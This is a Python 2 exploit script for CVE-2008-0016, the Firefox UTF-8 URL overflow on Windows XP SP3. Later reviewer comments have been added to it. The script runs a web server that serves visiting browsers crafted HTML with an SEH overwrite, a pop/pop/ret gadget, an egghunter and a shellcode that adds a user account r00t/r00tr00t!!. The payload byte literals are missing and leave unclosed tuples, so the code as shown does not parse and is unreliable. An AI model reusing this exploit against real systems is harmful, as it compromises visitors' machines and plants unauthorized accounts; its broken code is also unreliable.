# FireFox Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer 
from BaseHTTPServer import BaseHTTPRequestHandler 
import sys 

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
# Payload stored in the fake CDATA block; the egghunter (below) locates it by
# the 0x41424142 marker that create_exploit_buffer() prepends.
# NOTE(review): the byte-string literal that belongs inside this tuple is not
# present in this listing -- as shown the parenthesis is never closed and the
# file does not parse. The payload itself cannot be audited from here.
egg = (

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
# NOTE(review): same as ``egg`` above -- the literal is missing from this
# listing, so the tuple is left open.
shellcode = (

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
# "\xC3\xBA" is the UTF-8 encoding of U+00FA; the decode/encode round trip below
# is Python 2 specific (``unicode`` builtin) and yields the same two bytes again,
# so ``utf8chars`` is byte-identical to ``s``.
s = "\xC3\xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

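class myRequestHandler(BaseHTTPRequestHandler):
	"""Serve the crafted page that triggers the CVE-2008-0016 overflow.

	Only "/" is served; every other path now gets a 404 instead of a
	silently dropped connection. The body comes from
	create_exploit_buffer() and depends on the module-level ``egg``,
	``shellcode`` and ``utf8chars`` values.
	"""

	def create_exploit_buffer(self):
		"""Return the HTML page (a Python 2 byte string) sent to the browser.

		Layout: a fake CDATA block holding the egg marker plus the adduser
		payload, then an anchor whose href overflows the URL buffer. The
		non-ASCII literals are UTF-16 code units chosen so that, once the
		browser converts the URL to UTF-16LE, each character lands in
		memory as two payload bytes:
		  U+9090          -> 90 90        (nop padding)
		  U+10EB U+9090   -> eb 10 90 90  (jmp short over the SEH record)
		  U+11E7 U+6037   -> e7 11 37 60  (0x603711e7, pop/pop/ret in xpcom_core.dll)

		NOTE(review): this is a Python 2 source file containing non-ASCII
		string literals but no ``# -*- coding: utf-8 -*-`` declaration on
		line 1 or 2 (PEP 263); Python 2 refuses to compile it until one is
		added. Do not "correct" the ``<!CDATA[`` spelling or any literal in
		this method -- they are payload bytes, not markup.
		"""
		html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"

		# Egg marker (0x41424142, repeated twice as the egghunter expects) followed
		# by the encoded adduser shellcode; the egghunter scans memory for it.
		html += "<!CDATA[" + "\x42\x41\x42\x41\x42\x41\x42\x41" + egg
		html += "]>\n"

		html += "<a href=\""
		html += "\x01"
		html += "xx://dmc"
		html += utf8chars	# UTF-8 character that selects the vulnerable code path
		html += "/"
		html += "邐" * 1700	# Windows XP SP3 SEH offset
		html += "ძ邐"	# unicode - ptr to next seh "\xeb\x10\x90\x90";
		html += "ᇧ怷"	# 0x603711e7 - pop/pop/ret - xpcom_core.dll
		html +="邐" * 10
		html += shellcode # add egghunter
		html +="邐" * 10
		html += "\" >s</a>"
		html += "\n</body>"
		html += "\n</html>"
		return html

	def do_GET(self):
		"""Handle GET: exploit page for "/", 404 for anything else.

		The listing built the page but never wrote it to the socket, so the
		browser received nothing; the status line, headers and body are now
		actually sent.
		"""
		if self.path != "/":
			# e.g. /favicon.ico -- answer instead of leaving the client hanging.
			self.send_error(404)
			return
		html = self.create_exploit_buffer()
		self.printCustomHTTPResponse(200)
		self.wfile.write(html)
		print "[*] Evil payload sent\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\n"

	def printCustomHTTPResponse(self, respcode):
		"""Send the status line and headers for an HTML response.

		respcode: HTTP status code (the listing accepted it but never used
		it). Headers are terminated here; the caller writes the body to
		self.wfile afterwards.
		"""
		self.send_response(respcode)
		self.send_header("Content-type", "text/html")
		# send_response() already emits a default Server header; this adds a
		# second one, as the original did.
		self.send_header("Server", "myRequestHandler")
		self.end_headers()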

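print "FireFox x86 Exploit\nAuthor: dmc@deadbeef.co.uk\n"
print "[*] Starting evil web server"
print "[*] Waiting for clients\n"

# Binds every interface on TCP/80 (needs root/admin); nothing restricts which
# client receives the payload, so run this only on an isolated lab network.
httpd = HTTPServer(('', 80), myRequestHandler)

# The listing had the ``except`` without its ``try``; serve until interrupted
# and release the listening socket on the way out.
try:
	httpd.serve_forever()
except KeyboardInterrupt:
	print "\n\n[*] Interupt caught, exiting.\n\n"
finally:
	httpd.server_close()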